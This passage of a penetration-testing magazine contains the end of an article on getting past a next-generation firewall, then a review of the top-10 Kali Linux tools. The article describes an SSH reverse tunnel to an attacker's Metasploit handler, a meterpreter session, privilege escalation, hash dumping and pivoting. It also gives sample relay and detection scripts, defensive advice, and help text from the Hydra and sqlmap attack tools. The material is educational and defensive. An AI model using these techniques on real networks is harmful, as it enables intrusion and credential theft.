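Before the plink tunnel itself is built, here is what a local forward does with the bytes, as an added example that is not from the article: a plain TCP relay with the same shape as ssh -L / plink -L (a listening socket on the near end, one upstream connection per accepted client, data copied both ways), with the SSH transport left out so that the whole thing runs on loopback. In the article the near end is 127.0.0.1:6666 on the victim and the far end is port 6666 of the attacker host, where the Metasploit handler waits; here an echo server stands in for the handler. Class names, ports and the payload bytes are constructed for the example.

```python
import socket
import threading


def _pump(src, dst):
    # Copy src -> dst until src hits EOF, then pass the EOF on to dst.
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _recv_all(sock):
    # Read until the peer closes its write side.
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:
            return b"".join(chunks)
        chunks.append(data)


class _Listener:
    # Bind, accept in a background thread, stop cleanly (port 0 = ephemeral).
    def __init__(self, port, bind_addr="127.0.0.1"):
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.bind((bind_addr, port))
        self._srv.listen(5)
        self._srv.settimeout(0.2)            # lets the accept loop poll _stop
        self.port = self._srv.getsockname()[1]
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._loop, daemon=True)

    def start(self):
        self._thread.start()
        return self.port

    def _loop(self):
        while not self._stop.is_set():
            try:
                conn, _ = self._srv.accept()
            except socket.timeout:
                continue
            threading.Thread(target=self.handle, args=(conn,), daemon=True).start()

    def stop(self):
        self._stop.set()
        self._thread.join()
        self._srv.close()


class LocalForwarder(_Listener):
    """Data path of 'ssh -L port:dest_host:dest_port server' (plink -L in the
    article) minus the SSH transport: each client accepted on the local port
    gets its own connection to dest and bytes are relayed both ways."""

    def __init__(self, port, dest_host, dest_port, bind_addr="127.0.0.1"):
        super().__init__(port, bind_addr)
        self.dest = (dest_host, dest_port)
        self.sessions = 0

    def handle(self, client):
        try:
            upstream = socket.create_connection(self.dest, timeout=5)
        except OSError:
            client.close()                   # far end unreachable: drop client
            return
        self.sessions += 1
        back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
        back.start()
        _pump(client, upstream)              # client -> upstream in this thread
        back.join()
        for s in (client, upstream):
            s.close()


class EchoServer(_Listener):
    """Stands in for the far end of the tunnel (the article's Metasploit
    handler): echo everything back once the client has finished sending."""

    def handle(self, conn):
        conn.sendall(_recv_all(conn))
        conn.close()


def send_through(port, payload, host="127.0.0.1"):
    """Client at the near end: send payload, signal EOF, return the reply."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        return _recv_all(s)
```

To try it by hand: far_end = EchoServer(0); tunnel = LocalForwarder(0, "127.0.0.1", far_end.start()); send_through(tunnel.start(), b"stage request") returns the same bytes, having crossed the relay twice. The one thing the real tunnel adds is that the relay's upstream leg runs inside the SSH session, which is exactly the leg the perimeter firewall sees and cannot read.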


Figure 3. Establish a remote session using netcat

Now, using plink.exe, we must create an SSH tunnel to connect port 6666 of the remote host (the compromised host) to port 6666 on the local host (the port numbers can be anything, but then you have to create the payload to use the ones you decide on).

Figure 4. Establish an ssh connection back from the remote compromised host to the attacker host, forwarding port 6666 on the remote host to port 6666 on the attacker host

Once the SSH connection is established, you can see port 6666 on the Windows machine in LISTENING state.

Figure 5. Port 6666 open and listening on the remote compromised host

Now on the local host (attacker) we set up a Metasploit handler for the same payload that we created and uploaded to the Windows box, listening on port 6666 (the port that we configured in the SSH tunnel). As LHOST put the IP of the local host, because the connection to the handler will come through the tunnel and therefore will arrive from the end of the tunnel on the host itself to port 6666.

Figure 6. Configuration of the Metasploit multi handler to get the reverse meterpreter session

Once the whole stage is set, just execute the payload met.exe on the remote box. Once executed, the handler on the local host will receive the connection and send the stage that opens the session. The following picture shows it.

Figure 7. Meterpreter reverse session opened on the attacker host

BINGO!!! We have a meterpreter session on the remote host, bypassing the next generation firewall.
As seen in the image, Metasploit sees the connection coming from 10.10.0.10 (the IP of the host itself). This is because the connection comes through the SSH tunnel.
Once we achieve our goal, we can use this session to pivot and try to attack other boxes on the local network 192.168.65.0/24.
In the meterpreter session we can use the script arp_scanner to find hosts on the network to attack. The following figure shows the operation of the script.

Figure 8. Using the arp_scanner meterpreter script to discover more hosts on the compromised network

The next picture shows how to escalate privileges using the getsystem meterpreter command, how to capture the authentication hashes of the compromised box, and how to add a route to Metasploit so that the opened session (number 1 in this example) is used to reach the 192.168.65.0/24 network.

Figure 9. Escalate privileges with getsystem, dump hashes from the compromised host and configure a route in Metasploit to reach the remote network from the attacker host

After adding the route, we can use any Metasploit module (psexec comes to mind) against hosts on the LAN, but that is beyond the scope of this article.

Conclusions
I think we all agree that every company needs a firewall that separates its local network from the Internet, but we must be aware that a firewall cannot be the only element of network security.
In this article we have seen how in some cases the firewall detects malicious code and is capable of blocking the connections, but we have also demonstrated how easy it is to bypass this restriction.
A firewall, even the most expensive one, cannot protect an entire network infrastructure from being attacked. It must be one element of the company's security policy, being the first line of security between the Internet and the LAN, but not the only one.
The better choice is the deployment of a defense in depth strategy, which means implementing as many layers of security as possible (like an onion), always keeping in mind the value of what we are trying to protect and the cost of the security measures deployed.
So, all network infrastructure should have various security measures. Based on my experience as a consultant, I would recommend at least the following:

Perimeter Firewall (first line of defense). It must bear all required network traffic, and the more features it possesses the better.
Traffic Monitoring System. We must try to be aware of everything that goes through our network, in real time if possible, but that can be very expensive; passive monitoring can be very useful while more economical. It will allow us to find anomalous behavior within the LAN, caused by possible failures, malware or intruders.
Network Antivirus and Antimalware. Usually in the firewall itself, or in the router if they are separate devices.
Host Antivirus and Antimalware. Although it is known that they only really serve to identify old threats, this component will prevent hosts from becoming infected with most of the malware and viruses on the Internet. They will not help much against a targeted attack, but they will force the intruder to try harder.
DMZ. If we have hosts exposing services to the Internet, it is more than advisable to create a demilitarized zone (DMZ) where those hosts are placed, separated from the LAN by a firewall (it may be the same perimeter firewall with three zones, or another firewall).
Periodic review of the security elements and policies (the measures that work today may not work against tomorrow's attacks). It is recommended to have a penetration test done once every year or two, especially if we publish services and hosts to the Internet.

Ignacio Sorribas
My name is Ignacio Sorribas. I am a Computer Engineer from the Universitat Jaume I in Castellón and a computer security specialist with over 7 years of experience and CISSP, OSCP, CCNA and CCNA Security certifications. My specialty is Penetration Testing in Web environments and data networks. Currently working as a Senior IT Security Analyst (PenTester) in Advanced Technologies for Security SLU (AT4Sec).
I am also an external teacher of Security courses in Universitat Politècnica de Valencia (UPV) and Universitat Jaume I de Castellón (UJI), where I show PenTesting techniques and tools, focusing on Metasploit Framework and related tools. At UPV, I participate in the Computer Security Course from the Lifelong Learning Centre (CFP), and at UJI, I participate in the Security Course Attack and Defense from the Enterprise University Foundation (FUE).
I am also a proud father and husband. I have two little boys (hackers on the way) and a wonderful wife.
In my free time, I like to practice all the sports that I can, whether running, playing handball, going biking, etc. My great passion is kiteboarding, but unfortunately I can no longer spend much time on it.
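The Traffic Monitoring System recommended in the conclusions above is where the tunnel of this article becomes visible, provided one knows what to look for: the SSH session itself is opaque, but the flow around it is not. The script below is an added example and not part of the article. It runs three simple checks over constructed firewall flow records in a made-up key=value layout (the addresses follow the lab above, with 10.10.0.0/24 playing the Internet): a host that only serves (the SQL Server) opening any outbound connection, SSH to the Internet from a host that is not an expected SSH client, and SSH identified on a port other than 22. The policy values and the app= field (an application-identifying firewall, as the article's NGFW is, can label SSH without decrypting it) are assumptions a real deployment would replace.

```python
import ipaddress
from dataclasses import dataclass

# Constructed flow records in an invented key=value layout (no vendor's
# format). 192.168.65.0/24 is the article's LAN; 10.10.0.0/24 plays the
# Internet. Line 3 is the article's tunnel; line 5 is SSH on port 6666.
SAMPLE_LOG = """\
2013-05-02T10:12:03 src=192.168.65.20 dst=10.10.0.5 dport=443 proto=tcp app=tls dur=12 bytes=48211
2013-05-02T10:14:41 src=192.168.65.10 dst=10.10.0.10 dport=21 proto=tcp app=ftp dur=4 bytes=1020
2013-05-02T10:15:02 src=192.168.65.10 dst=10.10.0.10 dport=22 proto=tcp app=ssh dur=1820 bytes=734221
2013-05-02T10:16:10 src=192.168.65.30 dst=10.10.0.40 dport=22 proto=tcp app=ssh dur=300 bytes=90112
2013-05-02T10:20:55 src=192.168.65.20 dst=10.10.0.10 dport=6666 proto=tcp app=ssh dur=900 bytes=211000
2013-05-02T10:21:07 src=192.168.65.20 dst=192.168.65.10 dport=1433 proto=tcp app=tds dur=2 bytes=3100
"""


@dataclass(frozen=True)
class Flow:
    ts: str
    src: ipaddress.IPv4Address
    dst: ipaddress.IPv4Address
    dport: int
    app: str
    duration: int
    nbytes: int


def parse_line(line):
    """One log line -> Flow, or None for blank or malformed lines."""
    parts = line.split()
    if len(parts) < 2:
        return None
    kv = dict(tok.split("=", 1) for tok in parts[1:] if "=" in tok)
    try:
        return Flow(ts=parts[0],
                    src=ipaddress.ip_address(kv["src"]),
                    dst=ipaddress.ip_address(kv["dst"]),
                    dport=int(kv["dport"]),
                    app=kv.get("app", "unknown"),
                    duration=int(kv.get("dur", 0)),
                    nbytes=int(kv.get("bytes", 0)))
    except (KeyError, ValueError):
        return None


@dataclass(frozen=True)
class Policy:
    lan: ipaddress.IPv4Network
    ssh_clients: frozenset   # hosts expected to open SSH to the Internet
    servers: frozenset       # hosts that should never initiate egress


# Assumed policy for the article's lab: the SQL Server (.10) is server-only
# and only an admin workstation (.30) is expected to use SSH outbound.
LAB_POLICY = Policy(
    lan=ipaddress.ip_network("192.168.65.0/24"),
    ssh_clients=frozenset({ipaddress.ip_address("192.168.65.30")}),
    servers=frozenset({ipaddress.ip_address("192.168.65.10")}),
)


def detect(lines, policy):
    """Return (flow, reason) for every LAN -> Internet flow breaking the policy."""
    alerts = []
    for line in lines:
        f = parse_line(line)
        if f is None or f.src not in policy.lan or f.dst in policy.lan:
            continue                         # only egress flows matter here
        if f.src in policy.servers:
            alerts.append((f, f"server {f.src} initiated outbound connection to {f.dst}:{f.dport}"))
        if f.app == "ssh" and f.src not in policy.ssh_clients:
            alerts.append((f, f"ssh to Internet from {f.src}, not an expected ssh client"))
        if f.app == "ssh" and f.dport != 22:
            alerts.append((f, f"ssh on non-standard port {f.dport} from {f.src}"))
    return alerts


def sources_flagged(alerts):
    """Distinct internal hosts with at least one alert, as strings."""
    return sorted({str(f.src) for f, _ in alerts})


if __name__ == "__main__":
    for flow, reason in detect(SAMPLE_LOG.splitlines(), LAB_POLICY):
        print(f"{flow.ts} {reason} ({flow.app}, {flow.duration}s, {flow.nbytes} bytes)")
```

The first rule alone would have caught this article's attack twice (the FTP download of the payload and the SSH session, both initiated by a database server that has no business talking to the Internet), without the firewall ever seeing inside the tunnel. The allowlist of SSH clients is what keeps the admin workstation's session out of the alert list, so it needs to be maintained, not guessed.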


TOOLS

The Top 10 Kali Linux Security Tools
Kali Linux is a bare-metal rebuild of the popular security toolkit BackTrack. The funding and development come from the Offensive Security team.

Kali Linux is designed as a single-purpose toolkit for network penetration testing and forensic audit, so it is missing some of the more general applications. There are no games visible in the main menu on Kali by default, though you might have so much fun with the content of the Kali directory (Figure 2) that you never really notice the lack. The security applications are listed by category and subcategory. There are 432 tools, more or less. Some of the tool links are to sections of a single tool; for instance, there are several links to different areas of the Metasploit Framework, and there are links to start and stop Apache2 HTTPD, MySQL, Metasploit, OpenVAS, BeEF, Dradis and the SSH server. As you will see below, the Metasploit Framework gets its own subcategory.

Figure 1. Kali Linux

Figure 2. Kali Linux Tools

Kali Categories and Sub-Categories

Top 10 Security Tools
    Aircrack-ng
    burpsuite
    hydra
    john (the ripper)
    maltego
    metasploit framework
    nmap
    owasp-zap
    sqlmap
    wireshark

Information Gathering
    DNS Analysis
    IDS/IPS Identification
    Live Host Identification
    Network Scanners
    OS Fingerprinting
    OSINT Analysis
    Route Analysis
    Service Fingerprinting
    SMB Analysis
    SMTP Analysis
    SNMP Analysis
    SSL Analysis
    Telephony Analysis
    Traffic Analysis
    VoIP Analysis
    VPN Analysis

Vulnerability Analysis
    Cisco Tools
    Database Assessment
    Fuzzing Tools
    Misc Scanners
    Open Source Assessment
    OpenVAS

Web Applications
    CMS Identification
    Database Exploitation
    IDS/IPS Identification
    Web Application Fuzzers
    Web Application Proxies
    Web Crawlers
    Web Vulnerability Scanners

Password Attacks
    GPU Tools
    Offline Attacks
    Online Attacks

Wireless Attacks
    802.11 Wireless Tools
    Bluetooth Tools
    Other Wireless Tools
    RFID / NFC Tools

Exploitation Tools
    BeEF XSS Framework
    Cisco Attacks
    Exploit Database
    Metasploit *
    Network Exploitation
    Social Engineering Toolkit

Sniffing/Spoofing
    Network Sniffers
    Network Spoofing
    Voice and Surveillance
    VoIP Tools
    Web Sniffers

Maintaining Access
    OS Backdoors
    Tunneling Tools
    Web Backdoors

Reverse Engineering
    Debuggers
    Disassembly
    Misc RE Tools

Stress Testing
    Network Stress Testing
    VoIP Stress Testing
    Web Stress Testing
    WLAN Stress Testing

Hardware Hacking
    Android Tools
    Arduino Tools

Forensics
    Anti-Virus Forensics Tools


    Digital Anti-Forensics
    Digital Forensics
    Forensic Analysis Tools
    Forensic Carving Tools
    Forensic Hashing Tools
    Forensic Imaging Tools
    Forensic Suites
    Network Forensics
    Password Forensics Tools
    PDF Forensics Tools
    RAM Forensics Tools

Reporting Tools
    Documentation
    Evidence Management
    Media Capture

System Services
    BeEF
    Dradis
    HTTP
    Metasploit *
    MySQL
    OpenVAS
    SSH

The Top 10 Security Tools
This article is not the place to detail the features of all these tools, but perhaps the tools that the developers consider to be the top ten could be covered, to some benefit for people considering putting Kali into their network security toolbox.

Aircrack-ng
http://www.aircrack-ng.org
Description (from the project site)
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.

Review
Aircrack-ng help:

    Aircrack-ng 1.2 beta1 (C) 2006-2010 Thomas d'Otreppe
    Original work: Christophe Devine
    http://www.aircrack-ng.org

    usage: aircrack-ng [options] <.cap / .ivs file(s)>

    Common options:

    -a <amode>: force attack mode (1/WEP, 2/WPA-PSK)
    -e <essid>: target selection: network identifier
    -b <bssid>: target selection: access point's MAC
    -p <nbcpu>: # of CPU to use (default: all CPUs)
    -q: enable quiet mode (no status output)
    -C <macs>: merge the given APs to a virtual one
    -l <file>: write key to file

    Static WEP cracking options:

    -c: search alpha-numeric characters only
    -t: search binary coded decimal chr only
    -h: search the numeric key for Fritz!BOX
    -d <mask>: use masking of the key (A1:XX:CF:YY)
    -m <maddr>: MAC address to filter usable packets
    -n <nbits>: WEP key length: 64/128/152/256/512
    -i <index>: WEP key index (1 to 4), default: any
    -f <fudge>: bruteforce fudge factor, default: 2
    -k <korek>: disable one attack method (1 to 17)
    -x or -x0: disable bruteforce for last keybytes
    -x1: last keybyte bruteforcing (default)
    -x2: enable last 2 keybytes bruteforcing
    -X: disable bruteforce multithreading
    -y: experimental single bruteforce mode
    -K: use only old KoreK attacks (pre-PTW)
    -s: show the key in ASCII while cracking
    -M <num>: specify maximum number of IVs to use
    -D: WEP decloak, skips broken keystreams
    -P <num>: PTW debug: 1: disable Klein, 2: PTW
    -1: run only 1 try to crack key with PTW

    WEP and WPA-PSK cracking options:

    -w <words>: path to wordlist(s) filename(s)

    WPA-PSK options:

    -E <file>: create EWSA Project file v3
    -J <file>: create Hashcat Capture file
    -S: WPA cracking speed test
    -r <DB>: path to airolib-ng database (Cannot be used with -w)


    Other options:

    -u: Displays # of CPUs & MMX/SSE support
    --help: Displays this usage screen

You can crack weak passwords on WEP- or WPA-encrypted networks.

Burp Suite
http://portswigger.net/burp/
Description (from the project site)
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware Spider, for crawling content and functionality.
An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual requests.
A Sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Review
To use Burp Suite, you need to set the tool as your web browser's proxy. You can then spider sites and choose which attack modes you are going to use to attack specific vulnerabilities (Figure 3).

Figure 3. BurpSuite

Hydra
http://www.thc.org/thc-hydra/
Description (from the project site)
A very fast network logon cracker which supports many different services.

Review
Hydra help:

    Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only.

    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

    Options:
    -R restore a previous aborted/crashed session
    -S perform an SSL connect
    -s PORT if the service is on a different default port, define it here
    -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
    -p PASS or -P FILE try password PASS, or load several passwords from FILE
    -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
    -e nsr try "n" null password, "s" login as pass and/or "r" reversed login
    -u loop around users, not passwords (effective! implied with -x)
    -C FILE colon separated "login:pass" format, instead of -L/-P options
    -M FILE list of servers to be attacked in parallel, one entry per line
    -o FILE write found login/password pairs to FILE instead of stdout
    -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
    -t TASKS run TASKS number of connects in parallel (per host, default: 16)


    -w / -W TIME waittime for responses (32s) / between connects per thread
    -4 / -6 prefer IPv4 (default) or IPv6 addresses
    -v / -V / -d verbose mode / show login+pass for each attempt / debug mode
    -U service module usage details
    server the target server (use either this OR the -M option)
    service the service to crack (see below for supported protocols)
    OPT some service modules support additional input (-U for module help)

    Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

    Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. This tool is licensed under AGPL v3.0.
    The newest version is always available at http://www.thc.org/thc-hydra
    These services were not compiled in: sapr3 oracle.

    Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy. E.g.:

    % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
    % export HYDRA_PROXY_HTTP=http://proxy:8080
    % export HYDRA_PROXY_AUTH=user:pass

    Examples:
      hydra -l user -P passlist.txt ftp://192.168.0.1
      hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
      hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5

John the Ripper
http://www.openwall.com/john/
Description (from the project site)
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.

Review
John is a very effective password cracker, with a large following in the IT security community. There are several hashes John can crack (Figure 4).

Figure 4. John the Ripper

Maltego
http://www.paterva.com/web6/products/maltego.php
Description (from the project site)
With the continued growth of your organization, the people and hardware deployed to ensure that it remains in working order is essential, yet the threat picture of your environment is not always clear or complete. In fact, most often it's not what we know that is harmful, it's what we don't know that causes the most damage. This being stated, how do you develop a clear profile of what the current deployment of your infrastructure resembles? What are the cutting edge tool platforms designed to offer the granularity essential to understand the complexity of your network, both physical and resource based? Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego's unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.
The unique perspective that Maltego offers to both network and resource based entities is the aggregation of information posted all over the internet, whether it's the current configuration of a router poised on the edge of your network or the current whereabouts of your Vice President on his international visits; Maltego can locate, aggregate and visualize this information.
Maltego offers the user unprecedented information. Information is leverage. Information is power. Information is Maltego (Figure 5).

Figure 5. Maltego

Review
From hosts to users to emails and messages to infrastructure and even weapons, Maltego gives you a way to visualize your environment in a very information-rich way. Maltego lets you track relationships and entities in 11 different ways and lets you visualize them in three ways: main view, bubble view and as an asset list. Very interesting tool.

Metasploit Framework
http://www.metasploit.com/
Description (from the project site)
Reduce the risk of a data breach by downloading our penetration testing solutions. Discover how vulnerabilities become real risks as you test the defenses of your own network, using the same methods as an outside attacker. Our penetration testing software gives you a clear view as to what vulnerabilities can easily be exploited within your environment so you can focus on the most critical vulnerabilities.
Safely simulate attacks on your network to uncover pressing security issues. Use with Nexpose to assess and validate security risks in your environment. Verify your defenses, security controls and mitigation efforts. Manage phishing exposure, and audit web applications.

Review
Metasploit has a client-server architecture, like Nessus, OpenVAS and Apache httpd. It is possible to install Metasploit as a service so that the Metasploit server starts whenever the host boots. The version of Metasploit included with Kali does not run as a service, but must be started when you want to use it.

Figure 6. Metasploit

The first time you go to https://localhost:3790/ you see a new-user registration. Once your password is approved, Metasploit lets you insert the key code you got by registering on their site.

Figure 7. Metasploit Registration

To run Metasploit, start a new project, name it, give it a description if you want, and set the IP range you are testing (see Figure 7).


TOOLS
The first step of the Metasploit scan is a Discovery phase, which initiates an NMap -A -T4 IP-range test (Figure 9) and then proceeds through NetBIOS probes and about 100 other tests.
After the Discovery phase, you have an analysis of hosts, ports open, services, vulnerabilities and data captured. In the test network there were 5 hosts and 27 services running on open ports, but no listed vulnerabilities. Rest assured, the average LAN would have a few vulnerabilities.

Figure 8. Nmap
Figure 9. Discovery phase with Metasploit

Nmap
http://nmap.org/
Description (from the project site)
Nmap (Network Mapper) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Review
NMap, which has been around since 1996, is one of the main open-source tools in any network administrator's toolbox. This researcher has used NMap for mapping networks, checking for running services, troubleshooting connectivity problems and checking network routes available for about ten years (Figure 10).
The basic command-set is pretty easy to learn, and the documentation is very good. The only thing NMap won't do is map a network by NetBIOS names and return IP addresses.

Figure 10. Nmap
Figure 11. Nmap results



You do not have to run NMap as root on a UNIX or Linux platform or as an Administrator on Windows, but some NMap functions need to be root to work properly. Since Kali Linux is designed to be a specialized toolkit, you don't have to be concerned about whether you started NMap as root or not. You are always logged in as root on the default setup.
The example in the image below, nmap -A -T5, is a scan of 1000 popular ports, checking for services with very aggressive timing. Timing goes from T1 (paranoid) to T3 (standard) to T5 (Very Aggressive). In my test network (wireless, by the way), there is an Ubuntu laptop and a Brother printer. NMap was accurate about the ports open and services available. The printer would have to have the telnetd shut down and the anonymous FTP access removed if it were going to pass a PCI-DSS audit. Luckily this network segment has no customer card data passing through it (Figure 11).
One feature of NMap is its GUI counterpart, ZenMap. Zenmap shows the CLI command the user would be entering in a terminal emulator, so even an extremely command-line-averse administrator gets subliminal training in how to use NMap on the CLI. ZenMap is included in the Kali Linux Full ISO (Figure 12).

OWASP-zap
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Description (from the project site)
The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

Review
The OWASP Zed Attack Proxy needs Java 7. The interface is simple and works pretty quickly. The image below shows a spidering attack on a site. There are over 3400 URIs on the site (Figure 13). You can also send tailored HTTP requests and responses with OWASP-ZAP.

SQLmap
http://sqlmap.org/
Description (from the project site)
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database
Figure 12. ZenMap
Figure 13. OWASP-zap

servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (Figure 14).

Figure 14. SQLmap

Review
The basic command set is at

sqlmap.py -h

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to set the target(s)

    -u URL, --url=URL   Target URL (e.g. "www.target.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header
    --random-agent      Use randomly selected HTTP User-Agent header
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (0-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
    -C COL              DBMS database table column to enumerate

  Operating system access:
    These options can be used to access the back-end database management system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behaviour
    --flush-session     Flush session files for current target


  Miscellaneous:
    --wizard            Simple wizard interface for beginner users

[!] to see full list of options run with -hh
[*] shutting down at 23:34:40

The Wizard is interesting. Designed for beginners, it gives a series of questions to help construct the sqlmap query.

Wireshark
http://www.wireshark.org/
Description (from the project site)
Wireshark is the world's foremost network protocol analyzer. It lets you see what's happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions.
Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Features
Wireshark has a rich feature set which includes the following:
Deep inspection of hundreds of protocols, with more being added all the time
Live capture and offline analysis
Standard three-pane packet browser
Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
The most powerful display filters in the industry
Rich VoIP analysis
Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer (compressed and uncompressed), Sniffer Pro, and NetXray, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
Capture files compressed with gzip can be decompressed on the fly
Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
Coloring rules can be applied to the packet list for quick, intuitive analysis
Output can be exported to XML, PostScript, CSV, or plain text (Figure 15).

Figure 15. Wireshark

Review
Wireshark is one of the best traffic-analysis tools, either open-source or proprietary. On any given day, hundreds of network administrators and security researchers are running Wireshark on their network to discover the traffic patterns in the network.

Notes on Installing Kali
There are currently ports of Kali Linux for 64-Bit, 32-Bit, ARMEL, and ARMHF. This researcher downloaded the 64-Bit full version to make a test-bed in Oracle VirtualBox on one machine, and both the 32-Bit Full ISO and the 32-Bit Mini ISO to test on an older 32-Bit test machine. The Mini ISO is strictly the core of the Kali operating system, so it is only 20MB to download, and it uses tasksel in the install to let the user add the features that are not standard, such as laptop code, HTTPD, MySQL and so on.
The 64-Bit Full-ISO install went very quickly with practically no user interaction. The 32-Bit Mini ISO has taken more than a day to install, has required several user interactions, and crashed at the end. The lesson here appears to be that the Mini ISO, which has to download all its software during the installation, may suffer from network timeouts. The 64-Bit and 32-Bit Full ISO give the user a choice to use it as a live disk, which is useful in forensic research, where it is important not to alter the state of the hard drives, and in places where the machine used for testing may be compromised already (Figure 16).
A bare-metal installation from the 32-Bit full ISO on an old laptop worked flawlessly, so the testing went on from that platform.

Missing Applications
Though Kali is a Debian derivative and most Debian packages appear to be available using apt-get or your favorite package manager, the three packages that would have made this a perfect default installation are:
Apache OpenOffice or LibreOffice, or some report-writing word-processing software.
